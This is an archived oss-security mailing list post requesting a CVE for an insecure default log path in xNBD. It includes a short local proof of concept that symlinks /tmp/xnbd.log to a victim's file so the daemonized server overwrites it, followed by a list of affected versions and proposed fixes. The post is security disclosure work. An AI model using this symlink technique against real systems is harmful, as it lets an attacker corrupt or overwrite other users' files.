Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 06 Feb 2013 17:48:59 +0100
From: Sebastian Pipping <sebastian@...ping.org>
To: oss-security@...ts.openwall.com
Subject: CVE request: Insecure default log file path in xNBD

Hello oss-security!


Target software
===============

xNBD upstream
   https://bitbucket.org/hirofuchi/xnbd

Official Debian packages
   http://packages.debian.org/sid/xnbd-server


Description
===========

xnbd-server (and xnbd-wrapper in some releases) use /tmp/xnbd.log
for logging when parameter --daemonize (and no --logpath FILE) is given.

The file is opened using flags O_WRONLY | O_CREAT | O_APPEND so there
is a vulnerability against symlinks attacks.


Demonstration
=============

Here is an exploitation example:

   $ ln -s "${HOME}"/ATTACK_TARGET /tmp/xnbd.log

   $ touch DISK
   $ truncate --size=$((100*1024**2)) DISK

   $ /usr/sbin/xnbd-server --daemonize --target DISK
   xnbd-server(12462) msg: daemonize enabled
   xnbd-server(12462) msg: cmd target mode
   xnbd-server(12462) msg: disk DISK size 104857600 B (100 MB)
   xnbd-server(12462) msg: xnbd master initialization done
   xnbd-server(12462) msg: logfile /tmp/xnbd.log

   $ ls -l ~/ATTACK_TARGET
   -rw------- 1 user123 user123 653 Feb  1 16:41 \
     /home/user123/ATTACK_TARGET


Affected versions
=================

The latest code in the upstream Mercurial repository is not affected
since it does not use logging to /tmp/xnbd.log (or any default
location) any more.

----------------------------------------------------------------------
   Version                        Status
----------------------------------------------------------------------
   0.0.x                          not analyzed
   0.1.0-pre                      VULNERABLE (xnbd-server only)
   0.1.0-pre-hg20-e75b93a47722-2  VULNERABLE (xnbd-server and -wrapper)
   Mercurial tip                  not vulnerable
----------------------------------------------------------------------


Options for a fix
=================

  a) Use syslog with --daemonize and no default file location in general
     (i.e. what upstream did)

  b) Use /var/log/xnbd-server.log and /var/log/xnbd-wrapper.log
     for the hard-coded defaults

  c) Replace flag O_APPEND by O_EXCL  (secure but reducing functionality)

The attached patch applies approach (b) to version 
0.1.0-pre-hg20-e75b93a47722.


Best,



Sebastian

View attachment "xnbd-0.1.0-pre-hg20-e75b93a47722-insecure-logging-location.patch" of type "text/x-patch" (6162 bytes)

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ